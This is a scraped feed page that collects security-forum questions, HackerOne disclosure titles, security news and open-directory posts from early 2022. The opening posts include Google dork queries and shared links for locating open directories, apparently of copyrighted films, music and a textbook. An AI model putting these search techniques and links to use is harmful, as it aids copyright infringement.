    Does anyone know of a good website or document explaining these Google commands? http://www.googleguide.com/advanced_operators_reference.html How to put them together and explaining the difference between inurl and -inurl? Do I put the file types in brackets, (.mkv|.mp4|.avi|.mov|.mpg|.wmv) like this or does it matter? IE; intext:"chernobyl" intitle:"index.of" (wmv|mpg|avi|mp4|mkv|mov) -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) or +(.mkv|.mp4|.avi|.mov|.mpg|.wmv) chernobyl intitle:"index of" -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) Note; commands are in a different order. Does order matter? The above link only explains one command at a time but, apparently you can compound these commands to be more specific. Thanks for your input... submitted by /u/klutz50 [link] [comments]  ( 1 min )
    Movies (2020, 2021), some Series and Anime
    http://smart-playtv.fr/VOD/ submitted by /u/gimvaainl [link] [comments]

  • Open

    Autopsy with wireshark
    Can you import pcap files from Wireshark into Autopsy? Is there an expansion to do this? submitted by /u/swatteam23 [link] [comments]  ( 1 min )
    Cellebrite 4PC PC requirements
    LE that is just about to become my department's first and sole Cellebrite user. We are putting a budget together (Cellebrite's sales people are annoyingly hard to get in contact with) and we've got our prices ballparked and everything looks good except a computer build. We've talked with 2 other Cellebrite users who both said they had to buy a $4-5k desktop build to work efficiently with Cellebrite. I've built a PC before and have a basic knowledge about them, however I don't get these $4k+ build costs when all that's really necessary is an average build with an Intel processor and a decent amount of RAM. Besides that I have put in a good chunk of the budget to cover memory and additional hard drives to handle data/evidence. Are the other Cellebrite users just getting railroaded by vendors selling them overpriced pre-built models or is there something more to the build/requirements? Any advice would be greatly appreciated. submitted by /u/crimsontidepride [link] [comments]  ( 4 min )
    Secure storage identification
    A follow-up to my previous post, can confirm that the premium tools are able to obtain contents of the secure storage. I did find a product that will tell you if secure storage is in use. Wondering if anyone knows how to manually determine whether secure storage is in use besides relying on the product to tell you? submitted by /u/scrappybytes [link] [comments]  ( 1 min )
  • Open

    [available] Calculus: Early Transcendentals Ninth Edition
    submitted by /u/joey-sm [link] [comments]
    Rob's stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Massive collection of music (mostly not well known artists)
    Update: Ok, i did not know the links redirected to Amazon (As i do not download mp3 files usually) What caught my attention was the bands names that i did not know about submitted by /u/SexRevolutionnow [link] [comments]  ( 1 min )
    photos of toronto
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Bolivian buses
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    In orginization stored xss using location (Larksuite survey app)
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/998138 - Bounty: $500
    Stored xss on helpdesk using user's city
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/971857 - Bounty: $500
    SQL Injection and plaintext passwords via User Search
    IBM disclosed a bug submitted by xyantix: https://hackerone.com/reports/703819
    Deserialization of potentially malicious data to RCE
    Django disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1415436
  • Open

    tlsmate: tool to scan TLS servers for their configuration weaknesses and vulnerabilities
    submitted by /u/CantSayThatMuch [link] [comments]
    A Deep Dive into The Grief Ransomware’s Capabilities
    submitted by /u/CyberMasterV [link] [comments]  ( 1 min )
  • Open

    What are the chances that I get a job abroad after graduating?
    Hey there, I'm from Tunisia (north Africa) I graduated a few months ago majoring in cyber security (I have a 3y degree in network administration and a 3y degree in security). I didn't start looking for a job until these past few days due to a personal problem in the family, but now I'm wondering what are my chances to find a job abroad. The usual destination for us is France but tbh I'm looking for somewhere else, anywhere in Europe, the US or even (uuum especially) Australia. I got 3 CCNA certs and my English is pretty good. The thing is my experience is limited to school projects and 2 internships where I touched on the real world work. I'm not posting my CV unless requested, I'm not here looking for a job (and I don't want to break any rule) but I'm here to ask. Please keep in mind the COVID situation in the world right now which I think is reducing the travelling potential. Thanks in advance. submitted by /u/Dalleuh [link] [comments]  ( 1 min )
    What tools do you use to audit AD users?
    What tools do you use to audit users on AD? For example, a list of those who haven't logged in for a very long time, or who haven't changed their password in a long time, or who are without 2FA. To be honest, I did not find such functionality in AD (or if I did, it was inconvenient). submitted by /u/athanielx [link] [comments]  ( 2 min )
    Appsec engineering at Meta/Facebook - how is the work?
    Hi, I'm wondering how is the work of application security engineers at meta/fb? Do they write code? or only do code reviews? What are the usual tasks of an engineer in such role? submitted by /u/sapup [link] [comments]  ( 1 min )
    CEO scam solution?
    Problem is: fake CEO or Senior Officials social media profiles are used to scam ("pay this fee to get this job"). - What solutions could monitor web/social media to find such fake profiles or websites? - Would these solutions find this? or is it something into social media/web monitoring? Thank you for the answers submitted by /u/NerdSupremacist [link] [comments]  ( 1 min )
    What's the name of this app that displays your other usernames?
    Few years ago, a friend of mine was travelling in GCC. (Gulf States) His friend showed him an app where he fed my friend's phone number and all his social ids popped up. All the different usernames he has been using, on other social media platforms, going back to several years. The sites that he remembers his id from - Grindr, Manjam, Gaydar, Badoo etc. Does anyone know what this thing is called? or what is the name of such app? submitted by /u/saffrown [link] [comments]  ( 1 min )
    Newbie with a couple questions about the CEH v11!
    Top of the mornin to ya fellow cyber lads and ladies! I'm hoping to take the ANSI v11 exam in the next three months or so and I have the following questions. Is 3 months enough of a prep time if I have a B.S. in Cybersecurity? (From what I hear, the ANSI is just a glorified Sec+) Access to the ilabs, The Textbook, Messier's Practice Tests, Messier's Study Guide, O'Reilly's Videos and Messier's v10 videos on Udemy. Will this do for prep material? Question about CEH Practical here. Will the Practical exam be a good first step on a year long journey to the OSCP? Tenks. submitted by /u/Puddin2yerHarley [link] [comments]  ( 1 min )
    TikTok is hideous...but unfortunately necessary for engaging with my readers. Any advice?
    I generally hate social media. It's toxic, predatory, and spying on the user 95% of the time. Unfortunately it's also a necessary engagement channel for writers. I've banished it from my personal life but unfortunately need to be able to connect with readers and market my stuff. I recently paid for a session with a social media consultant that was aghast I was not on TikTok. I explained my political concerns with TikTok's links to certain authoritarian governments, as well as the massive data-mining hard-cooked into the code, and the evidence it's detrimental to mental health. She looked at me like I was a caveman wearing a tinfoil hat and went on to show me some metrics. Sadly it became clear that most of the reader demographic I'm trying to market my content to are using TikTok almost exclusively as their drug of choice. Fuck. So here's my question/TLDR: Is there a third-party application or method of "corralling" TikTok's spying functions? Is it possible to post via a desktop browser and bypass the application entirely? Should I look into running it inside an emulator? I'd certainly appreciate any input or suggestions! Who knew cyberpunk dystopia could be so banal. submitted by /u/writtenloudly [link] [comments]  ( 5 min )
    Salary range for Jr Security Analyst at Bay Area CA
    Hi all, I was wondering what would be the salary range for Junior security analyst position at the Bay Area California? Is 100k asking too much? The cost of living is really expensive there, so I’m not so sure. Any help is appreciated! submitted by /u/nkookie [link] [comments]  ( 2 min )
    Need your suggestion for this scenario to withstand port scanning
    We have a hosted website which has multiple subdomains though about 1000. Recently a security research company started running port scans and this is affecting our website health. With some pages going down and the CPU usage crossing threshold. Basically the application is deployed in AKS(k8s) and the backends are behind the Azure Front Door and some subdomains are managed by Global Traffic Manager as well all on Azure. Unfortunately we cannot stop these scans however we have been asked to change our design or solution as the port scanner hit every subdomain at the same point which all of them points to a single host and this is causing the issue. Need your advice or suggestions on how we can overcome and withstand the port scans without affecting our site. How to load balance this scenario in a much more efficient way submitted by /u/SnooGoats8879 [link] [comments]  ( 1 min )
    Favourite CSPM?
    CSPMs are a must in enterprise environments these days. Based on my initial research, prisma cloud and orca security stand out. Are there any specific CSPMs that you'd recommend besides these two? submitted by /u/DryPath [link] [comments]  ( 1 min )
    Taking care of the parents
    I have an odd one and am looking for some advice. My parents are getting on in age and I am looking for a solution to help monitor their phones and give them remote support when they need it. I am going to hook them into my family plan with Lastpass to help them with passwords but is there anything for android that is the equivalent of LogMeIn? Also more of a general question but how do you all care for your parents tech wise? Not sure if I am overstepping my boundaries but I've already had one family fall prey to a scammer. submitted by /u/OakenRage [link] [comments]  ( 1 min )
  • Open

    Nim variant of MDSec's Parallel Syscalls EDR hook bypass
    submitted by /u/DarkGrejuva [link] [comments]
    Exploit Kits vs. Google Chrome - Avast Threat Labs
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-01-14 Review
    No news updates yet today. For more recent articles, visit SecWiki  ( 2 min )
  • Open

    Bug Alert —Critical Vulnerability Alerting System
    High impact vulnerability notification over email, phone call, or SMS Continue reading on Medium »  ( 2 min )
    My Pentest Log -2-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
    True Life: Recovering Bug Bounty Hacker: Chapter 1 — GoodRx
    I decided to start a series about the experiences I’ve had with bug bounty programs. I wanted to first start off with the written story so… Continue reading on Medium »  ( 8 min )
  • Open

    Honeypot Discussions Part-2
    Honeypot Types Continue reading on Medium »  ( 4 min )
    Powershell Execution Strategy
    What is powershell execution strategy Continue reading on Medium »  ( 6 min )
  • Open

    My Pentest Log -2-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
    Go 1.18 — native Fuzzing and Dinosaurs
    Last month, the Go language team released the Go 1.18 Beta 1. It contains the much awaited generic support, which we’re very excited to… Continue reading on Medium »  ( 4 min )
  • Open

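    Ukrainian police arrest ransomware gang that attacked more than 50 companies
    Ukrainian police arrested five cybercriminals; the gang reportedly used ransomware to attack about 50 US and European companies.  ( 1 min )
    Knowledge Continent Q&A vol.03 | First steps on the new continent
    A collection of popular questions from the official release launch!  ( 1 min )
    FreeBuf street interviews | At the start of 2022 we talked with 10 passers-by about cybersecurity
    The FreeBuf team randomly interviewed passers-by on the street to see how aware they really are of cybersecurity and personal protection.
    Java code audit: XSS (cross-site scripting)
    Working out how to defend against XSS by analyzing what causes it  ( 4 min )
    FreeBuf Weekly | "Cybersecurity Knowledge Continent" 1.0 officially launched; Facebook introduces "Privacy Center"
    Happy weekend, FreeBufers. Here is this week's "FreeBuf Weekly": we have rounded up and recommended the week's top news, quality articles and handy tools so that you don't miss any of this week's highlights!  ( 1 min )
    See you in Shanghai on March 2! CIS 2021 Spring edition agenda to be announced soon
    FreeBuf invites all cybersecurity professionals to gather at the Baohua Marriott Hotel in Shanghai on March 2 and 3 for the "CIS 2021 Cybersecurity Innovation Conference, Spring edition".  ( 1 min )
    White House hosts open source security summit attended by many tech giants
    On January 13 local time, many big tech companies and federal agencies gathered at the White House to discuss open source software security.
    Leagsoft (联软科技) releases: top ten endpoint security trends for 2022
    As a leader in enterprise endpoint security in China, Leagsoft, drawing on 19 years of endpoint security practice and industry experience, has published leading-edge endpoint security trends for three consecutive years, aiming to give the industry more new ideas and points of reference.  ( 1 min )
    Iranian APT35 hacking group uses Log4j vulnerability to deploy new PowerShell backdoor
    Research shows the Iranian APT35 group is exploiting the Log4Shell vulnerability in attacks and implanting a new type of backdoor.  ( 1 min )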
  • Open

    Snikket Server – 2022-01-13 security release (CVE-2022-0217)
    Article URL: https://snikket.org/blog/snikket-jan-2021-security-release/ Comments URL: https://news.ycombinator.com/item?id=29931694 Points: 1 # Comments: 0  ( 2 min )

  • Open

    Bug Report : [ No Valid SPF Records ]
    Ruby disclosed a bug submitted by sohaib619: https://hackerone.com/reports/1301696
    AEM forms XXE Vulnerability
    Adobe disclosed a bug submitted by ismailmuh: https://hackerone.com/reports/1321070
    Disclosure of github access token in config file via nignx off-by-slash
    Adobe disclosed a bug submitted by letm3through: https://hackerone.com/reports/1386547
    Reflected xss and open redirect on larksuite.com using /?back_uri= parameter.
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/955606 - Bounty: $500
    [IDOR] Modify other team's reminders via reminderId parameter
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/946323 - Bounty: $500
  • Open

    Propagating phishing via Slack webhooks
    submitted by /u/amirshk [link] [comments]
    Forensics Analysis of the NSO Group’s Pegasus Spyware
    submitted by /u/CyberMasterV [link] [comments]  ( 1 min )
    BreakingFormation: Orca Security Research Team Discovers AWS CloudFormation Vulnerability
    submitted by /u/eberkut [link] [comments]  ( 1 min )
    SSH Bastion Host Best Practices
    submitted by /u/old-gregg [link] [comments]
    HiddenWall is a tool to generate a custom Hidden firewall to run in Linux kernel.
    submitted by /u/CoolerVoid [link] [comments]  ( 2 min )
    This script analyses the Nmap XML scanning results, parses each CPE context and correlates to search CVE on NIST. You can use that to find public vulnerabilities in services.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
  • Open

    Security bulletin for recent AWS Glue vulnerability
    Article URL: https://aws.amazon.com/security/security-bulletins/AWS-2022-002/ Comments URL: https://news.ycombinator.com/item?id=29927538 Points: 2 # Comments: 0  ( 2 min )
    CVE-2021-31166: MS HTTP Protocol Stack Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166 Comments URL: https://news.ycombinator.com/item?id=29924445 Points: 16 # Comments: 0
    Severe Vulnerability Found in Another NPM Package
    Article URL: https://twitter.com/DevNackOfficial/status/1481671995167506433 Comments URL: https://news.ycombinator.com/item?id=29923463 Points: 4 # Comments: 0  ( 1 min )
    AWS Superglue Vulnerability
    Article URL: https://orca.security/resources/blog/aws-glue-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29923004 Points: 29 # Comments: 3  ( 5 min )
    BreakingFormation: AWS CloudFormation Vulnerability
    Article URL: https://orca.security/resources/blog/aws-cloudformation-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29922522 Points: 79 # Comments: 22  ( 5 min )
    Attacking RDP from Inside: Remote Desktop Named Pipe Vulnerability
    Article URL: https://www.cyberark.com/resources/threat-research-blog/attacking-rdp-from-inside Comments URL: https://news.ycombinator.com/item?id=29920955 Points: 2 # Comments: 0  ( 11 min )
    Found a Vulnerability In NPM Package
    Article URL: https://twitter.com/DevNackOfficial/status/1481537073068843013 Comments URL: https://news.ycombinator.com/item?id=29918100 Points: 1 # Comments: 2  ( 1 min )
    Exploring the Log4Shell Vulnerability through files
    Article URL: https://blog.borneo.io/exploring-the-log4shell-vulnerability-dd7000eed4a4?gi=5d43b39b3d22 Comments URL: https://news.ycombinator.com/item?id=29915825 Points: 2 # Comments: 0  ( 7 min )
  • Open

    SPF Record Question
    If a root domain like sendgrid.net is added to an SPF record, does that mean any free user or paid user of sendgrid can spoof an email from your domain and SPF checks would pass? submitted by /u/mtx4gk [link] [comments]  ( 1 min )
    How do I check if I visited a site with malware?
    I was browsing through reddit and clicked on a link in r/dermotology that sent me to a weird site that played a weird video and there was no question or content besides that. I used virus total to check the website and it looks like they're using it for advertising revenue clicks, but my paranoia is kicking in. Site was visited on an android with calyx is using duckduckgo version 5.106.0 So the question is- any ideas if I have to nuke this phone? For the curious the website is below. All the spaces are slashes minus the dot com part. vebotto com 2022 01 13 cystic-pimple submitted by /u/instantpotbeans [link] [comments]  ( 2 min )
    Google Drive Security - VPN and MFA
    Hi there, I'm posting here to get some expert advice, we are a small startup dealing with very sensitive customer data. Problems we are having - How do we best protect customer data within Google Drive? Customers often share data to us via Google Drive. In security questionnaire, we often get this question - is VPN required for employees to access customer data? We can of course turn on VPN requirement for this, but it also adds friction to use Google Drive on a daily basis. Google Drive has MFA turned on, but it does not seem to enforce zero trust policy, and we are never prompted to enter passwords regularly. Any suggestions here? submitted by /u/Commercial_Rip7550 [link] [comments]  ( 1 min )
    Reverse engineering question
    Hi r/AskNetsec I've got a pretty unusual question in regards to RE that might sound weird, or it's just not making sense to me (and bearing in mind, I am a beginner to reversing malware). I am currently writing a report and within the report format, "reverse engineering" and "disassembly" are two different sections. This doesn't really make much sense to me. Disassembly is already a form of reverse engineering. Nevertheless, the information that you could insert into an RE section would be Wireshark analysis, viewing the file in PEStudio for instance, but those are already in sections relating to static & dynamic analysis. So what would be inserted into a reverse engineering section regarding malware? I can literally only think of unpacking the malware as everything else that would constitute reverse engineering is in other sections. Honestly, I have no idea. When I asked for some help in regards to knowing the distinction between the two, I was told that "disassembly" is a noun, and "reverse engineering" is a verb. Which is probably right, but it didn't help at all. An example of breaking encryption was proposed in relation to RE. Again, it didn't shed much light for me. I just want to be familiar with the distinction here. Thanks. submitted by /u/pat0000 [link] [comments]  ( 2 min )
    Need an antivirus solution for webapp in MS Azure that is compliant with EU data protection law
    We run a webapp in Azure. Users can upload .zip, .pdf, .png, .jpeg and .csv files. Therefore an antivirus scanner is needed for those files. At another project we use ClamAV in an Azure container instance. The problem is containers don't scale very well. We would prefer a SaaS solution in Azure but there are few options. We need a solution that is scalable and doesn't send the files to servers outside the EU due to the local data protection law. At best the software is made by an EU company. We thought about "abusing" an Azure storage by uploading the files there and waiting if Microsoft Defender for Cloud reacts. Anyone any experience with this? How fast would such a solution be? Any recommendations? TLDR: need antivirus software for file upload webapp in Azure; SaaS preferred; scalability; compliant with EU data protection law. Thank you for your help! submitted by /u/devsecops22 [link] [comments]  ( 2 min )
    Brave Browser --Flags Questions
    Hi there r/AskNetsec I just wanted to ask a quick question if these specific flags out of the bunch that Brave runs are of any concern? The names sparked my interest and a bit of panic when I first noticed after using it for about a month. IdleDetection --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed Whole flag trace is this if needed: [redacted]\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --origin-trial-public-key=[redacted]=,[redacted]= --brave_session_token=[redacted] --field-trial-handle=[redacted],[redacted],[redacted] --enable-features=AutoupgradeMixedContent,LegacyTLSEnforced,PasswordImport,PrefetchPrivacyChanges,Red…  ( 1 min )
    Is there a solution to encrypt an OS at the RAM/CPU level?
    Thinking about cloud threat models, is there a solution that exists that can encrypt an OS at the RAM/CPU level to further restrict hosting providers' ability to reach, view and use a machine outside of the usual disk encryption. While I am sure it’s a long shot but there does exist a possibility where they can access the machine from a local terminal via their hosting infrastructure or dump the RAM on the hypervisor. Is there any way or value in preventing that or is it just a risk that has to be accepted when using a cloud provider? submitted by /u/concon2015 [link] [comments]  ( 1 min )
  • Open

    AVG Tune Up
    Anybody know what service AVG Tuneup uses to perform a cleanup when the program is executed? submitted by /u/mikefromjerz [link] [comments]  ( 1 min )
    I’ve heard SANS FOR508 and the GCFA is challenging. How challenging is it for an entry level candidate who is just starting out?
    Any tips? Experiences? I’ve had hands on forensics experience and have FOR500 knowledge. Is FOR508 doable? submitted by /u/curiousgal1996 [link] [comments]  ( 3 min )
  • Open

    Using GitHub to manage your first CVE
    Article URL: https://authzed.com/blog/using-github-to-manage-your-first-cve/ Comments URL: https://news.ycombinator.com/item?id=29925154 Points: 4 # Comments: 0  ( 9 min )
    CVE-2021-31166: MS HTTP Protocol Stack Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166 Comments URL: https://news.ycombinator.com/item?id=29924445 Points: 16 # Comments: 0
    Prosody 0.11.12 released (CVE-2022-0217 fix)
    Article URL: https://blog.prosody.im/prosody-0.11.12-released/ Comments URL: https://news.ycombinator.com/item?id=29921870 Points: 3 # Comments: 0  ( 1 min )
    A Quick CVE-2022-21907 FAQ (work in progress)
    Article URL: https://isc.sans.edu/forums/diary/28234/ Comments URL: https://news.ycombinator.com/item?id=29917559 Points: 2 # Comments: 1  ( 1 min )
  • Open

    Index of Movies, TV series and Documentaries (lots of BBC, how it's made etc..).
    submitted by /u/josephalbright1 [link] [comments]  ( 1 min )
    Sporalis
    https://drive.google.com/drive/folders/1rmL4Yn7mJ78emYQ-PjIhDGYkph_9iEjZ https://drive.google.com/drive/folders/1s3v5WdrPLEvnGLbzM8RGSyI0iorkbU-W https://drive.google.com/drive/folders/1nitHECSorEadPtGwK5F_9-TdAcHHJGZG submitted by /u/Burlack [link] [comments]
    Dont mind me. Just dropping some links to check size before downloading
    https://drive.google.com/drive/folders/1X2L-UtctJulbDEP63NnLSwlEaXgwTe0x https://drive.google.com/drive/folders/1pMRoHMd3H0P0g6lvEWFUR1teiPSy9VqR https://drive.google.com/drive/folders/0B2UZmHpzoVm6eXYyM09PUXF1TDA?resourcekey=0-A5ZN-_lF1S2Eh3xmJSC9kw https://drive.google.com/drive/folders/1nfMA72hL1PHFTWVkzjlSBAmfPyBg89dx https://drive.google.com/drive/folders/17KyX_80h0yBUrc3X-PMa3EnXoE0kFmJJ?sort=13&direction=a submitted by /u/Burlack [link] [comments]  ( 1 min )
    FTP OEM Pc Builder
    I'm trying to list the different ftp from computer builder. I think most of them are already present on this / r. But perhaps bringing them together in a single post is a good idea? (I will add them as I find them / the community finds them)
    HP FTP : ftp://ftp.hp.com
    |Url: ftp://ftp.hp.com/||Urls file|
    |Extension (Top 5)|Files|Size|
    |.exe|106,034|5.61 TiB|
    |.ibr|862|5.21 TiB|
    |.zip|10,739|443.95 GiB|
    |.fmw|290|384.7 GiB|
    |.iso|256|322.51 GiB|
    |Dirs: 83,006 Ext: 1,375|Total: 793,218|Total: 12.98 TiB|
    |Date (UTC): 2022-01-12 17:29:09|Time: 02:19:06|Speed: 22.87 MB/s (182.9 mbit)|
    Created by [KoalaBear84's OpenDirectory Indexer v2.2.0.9](https://github.com/KoalaBear84/OpenDirectoryDownloader/)
    IBM FTP : ftp://ftp.software.ibm.com/
    |Url: ftp://ftp.software.ibm.com/||Urls file|
    |Extension (…  ( 2 min )
  • Open

    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on System Weakness »  ( 3 min )
    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on Medium »  ( 2 min )
    Why Bugfix Postmortems Are Good For Web3
    This past year has been eventful for anyone building on the Web3 stack — over the course of the year, DeFi has grown from a nascent… Continue reading on Immunefi »  ( 3 min )
    Launching Collector Portal for a closed beta group
    We are proud to announce our beta platform launch for selected users starting on the 26th of January. Continue reading on Envoy »  ( 2 min )
    FB Lite All Users Active Status Changed
    I’m glad you’re here. Please have fun reading (nmochea). Continue reading on Medium »  ( 1 min )
    C.S.T.I Lead To Account Takeover $$$
    Hello amazing hunter, today I want to tell you a short story, but this story has a long memory for me. In this story I found some… Continue reading on System Weakness »  ( 2 min )
    Bug Bounty Methodology — Bug Hunting Checklist (PART-1)
    Hey, it’s me again back with another checklist. I saw various articles and tools specifically designed to exploit one vulnerability. It… Continue reading on Medium »  ( 2 min )
    My Perfect Bug Bounty Docker Setup
    I hate installing things on my computer because of the bloated slow mess it becomes over time. So when I found out about docker I fell in… Continue reading on System Weakness »  ( 3 min )
    PHP Type Juggling
    PHP is the dynamic language that checks variables when the program is executing and provides flexibility to the developers. But this… Continue reading on Medium »  ( 1 min )
  • Open

    SecWiki News 2022-01-13 Review
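    Running an EXE program filelessly via PowerShell by ourren QRS 2021 accepted papers list by ourren Getting started with Android reverse engineering, development and protocol analysis by analyzing a football-betting app by ourren For more of the latest articles, visit SecWiki  ( 2 min )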
  • Open

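    FreeBuf Morning News | Financial data of large numbers of Americans and Canadians exposed; Firefox hit by connectivity failure
    Global news 1. LastPass may face a €20 million fine for failing to fix a bug: because of its poor handling of problems, among other issues, the well-known password manager LastPass is facing the risk of a €20 million GDPR fine. [Read the original] 2. US jail hit by ransomware attack, surveillance cameras and door access system disrupted: a jail in the Albuquerque area of central New Mexico was hit by a ransomware attack last week; surveillance cameras became inaccessible and the automatic door system was also affected, leaving inmates  ( 1 min )
    FreeBuf enterprise-side group discussion | Talking about how to secure enterprise remote work
    From a security perspective, remote work means the boundary of the office network has been broken. How should enterprises re-examine their security strategy and reduce security risk?  ( 1 min )
    Millions of portable routers affected by KCodes NetUSB vulnerability
    Affected vendors include Netgear, TP-Link, Tenda, EDiMAX, D-Link and Western Digital.  ( 1 min )
    Financial data of large numbers of Americans and Canadians exposed
    Security researchers at Website Planet discovered a misconfigured database that exposed about 820,000 records, of which about 600,000 were customer credit records.  ( 1 min )
    Behavior analysis and decoding of the cross-platform malicious backdoor SysJoker
    In December 2021, Intezer discovered SysJoker, a cross-platform backdoor capable of attacking Windows, Mac and Linux.  ( 1 min )
    New malware SysJoker poses a threat to Windows, Linux and macOS operating systems
    The new SysJoker malware poses a threat to Windows, Linux and macOS operating systems and can use a cross-platform backdoor to carry out espionage.  ( 1 min )
    The "14th Five-Year" Digital Economy Development Plan again gives cybersecurity prominent mention
    Chapter 9 of the Plan, "Focusing on strengthening the digital economy security system", systematically sets out the unique role and importance of cybersecurity for the digital economy.
    Studying cybersecurity laws and regulations to raise technical managers' "legal" quotient
    Understanding the hierarchy of different laws and regulations helps us better understand the state's aims in the legislative process.  ( 1 min )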
  • Open

    Burp Suite roadmap for 2022
    With 2022 now underway, it's about time we gave you the latest on where Burp Suite is heading this year. Here we take a look at the powerful new Burp Suite features we'll be working on in 2022 - as we  ( 5 min )
  • Open

    Fuzzing101 with LibAFL – Part IV: Fuzzing LibTIFF
    Article URL: https://epi052.gitlab.io/notes-to-self/blog/2021-11-26-fuzzing-101-with-libafl-part-4/ Comments URL: https://news.ycombinator.com/item?id=29920636 Points: 1 # Comments: 0  ( 26 min )
  • Open

    Wading Through Muddy Waters | Recent Activity of an Iranian State-Sponsored Threat Actor
    submitted by /u/dmchell [link] [comments]
  • Open

    HONEYPOT DISCUSSIONS PART-1
    Welcome to Honeypot Discussions Part 1. There will be three parts to this article series about honeypots. Here, in the first article, we will be… Continue reading on Medium »  ( 5 min )

  • Open

    Miscellaneous Gaming Stuff.
    https://www.thegameisafootarcade.com/wp-content/uploads/ submitted by /u/EmuAnon34 [link] [comments]
    Are there such things as open navidrome / airsonic music servers to listen to?
    Rather than open directories of music, are there open servers that can be used with navidrome / airsonic clients to listen to the music? Are there strings one can use to maybe find them? The search engines aren't finding anything submitted by /u/papabear_12 [link] [comments]  ( 1 min )
  • Open

    Ransomware Damage Claims Driving Insurance Hikes
    The costs of cyber insurance policies are rising exponentially while underwriters are tightening the rules around who qualifies for cyber insurance, and at the same time, insurer capacity is constricting dramatically. The numbers are all over the place, but the latest statistics from the Council of Insurance Agents and Brokers reported a 25.5% increase in […] The post Ransomware Damage Claims Driving Insurance Hikes appeared first on Security Weekly.  ( 3 min )
  • Open

    Defeating EDRs with Office Products
    submitted by /u/dmchell [link] [comments]
  • Open

    Exploiting URL Parsing Confusion Vulnerabilities
    submitted by /u/ScottContini [link] [comments]
    Exploit Kits vs. Google Chrome
    submitted by /u/stashing_the_smack [link] [comments]
    Malicious modifications to open source projects affecting thousands
    submitted by /u/MiguelHzBz [link] [comments]  ( 1 min )
    Pre-Auth RCE in Moodle Part II - Session Hijack in Moodle's Shibboleth
    submitted by /u/albinowax [link] [comments]
    ThePhish is an open-source tool that automates the entire phishing email analysis process starting from the extraction of the observables from the header and the body of an email to the elaboration of a verdict which is final in most cases. It is based on TheHive, Cortex and MISP.
    submitted by /u/emalderson [link] [comments]  ( 1 min )
    Ransomware Actor May Have Leaked Their Previous Victims
    submitted by /u/Acrobatic-Pen-9949 [link] [comments]  ( 1 min )
    Researchers release final version of academic study testing 25 EDR and EPP vendors against attack vectors via CPL, HTA, DLL and EXE
    submitted by /u/woja111 [link] [comments]  ( 1 min )
    [CFP] Call for Papers for Hardwear.io Security Conference USA 2022 is OPEN!
    submitted by /u/hardweario [link] [comments]
  • Open

    AFL TUTORIALS FOR BEGINNERS 0X00
    For beginners: compiling with afl, using libs/objects, and how to fuzz with afl/afl++ Continue reading on Medium »  ( 2 min )
  • Open

    Lessons learned from my 10 year open source project
    For the past ten years, I’ve been building a popular open source project. Here are the lessons I’ve learned along the way. Continue reading on Medium »  ( 11 min )
    Bundesservice Telekommunikation — how I accidentally … a cover agency in the federal administration…
    A few days ago I did something so unusual that apparently almost nobody had done it before me: I … the list… Continue reading on Medium »  ( 6 min )
    OSINT PAKISTAN POLITICIANS
    OSINT CASE STUDY 2 Continue reading on Medium »  ( 3 min )
    It’s a Match! Dating Apps and SOCMINT
    Just like any other social media platform, dating sites are platforms which can be used in online investigations. Considering the current… Continue reading on Medium »  ( 4 min )
  • Open

    Creative / Effective ways to run a security awareness program?
    It's that time of the year again: we are looking to renew our contract with our security awareness vendor. Basically, they provide a portal where people need to go to watch videos of how to prevent the regular security stuff (identify tailgating, spot phishing mails, etc). Some of these videos don't even make sense (e.g. we are for 99% working from home. Tailgating is not a real issue here). Part of this is a "must do" (due to compliance/certification requirements). However, there must surely be a more fun/creative way of doing this? What are some nice/creative ways you have set up security awareness within your organization? Side-note: yes, I know this should be risk based. Yes, I know I should talk to other departments to identify their needs. ;) Just looking for some experiences and ideas. submitted by /u/Flagcapturer [link] [comments]  ( 1 min )
    What is your home setup like and what tech gadgets do you have in your room?
    Hi, I work in the InfoSec industry and, having worked from home for the last year or so, I want to now start doing up my room and make it very techy. At the moment, I do not have anything too exciting or amazing, but I am interested to know what your home setups are like. Thanks submitted by /u/dasozis [link] [comments]  ( 2 min )
    I get to help design a Cybersecurity room
    As the title says, I get to help design a cyber security room for a community college. I want to ask the Netsec community: what would you like to see if you were young and were curious about this world? Tools you wish you had? Something that would have made you excited when you walked past to get into cyber security? All recommendations welcome, thank you! submitted by /u/benxfactor [link] [comments]  ( 3 min )
    Any resources/guides on pen-testing a network not facing the internet?
    Anyone have any resources for pen-testing a network that's supposed to be air gapped? I'm working with some colleagues to pen-test our professor's lab as part of our assignment--mainly putting together a report on how we would approach the system if we had hands on access as both an admin and as a non privileged user. The lab itself is pretty simple--it's not supposed to be running any web apps or even to be touching the internet. Most pentest guides are great at showing you how to approach scanning the network for misconfigurations and vulnerabilities and then moving over to web applications but I'm wondering if we're limited to just enumerating the system and hoping for the best? Mainly looking for resources I can use as references to back any ideas on what's doable. Thanks. submitted by /u/CyberspaceAggressor [link] [comments]  ( 1 min )
    Another subnetting question!
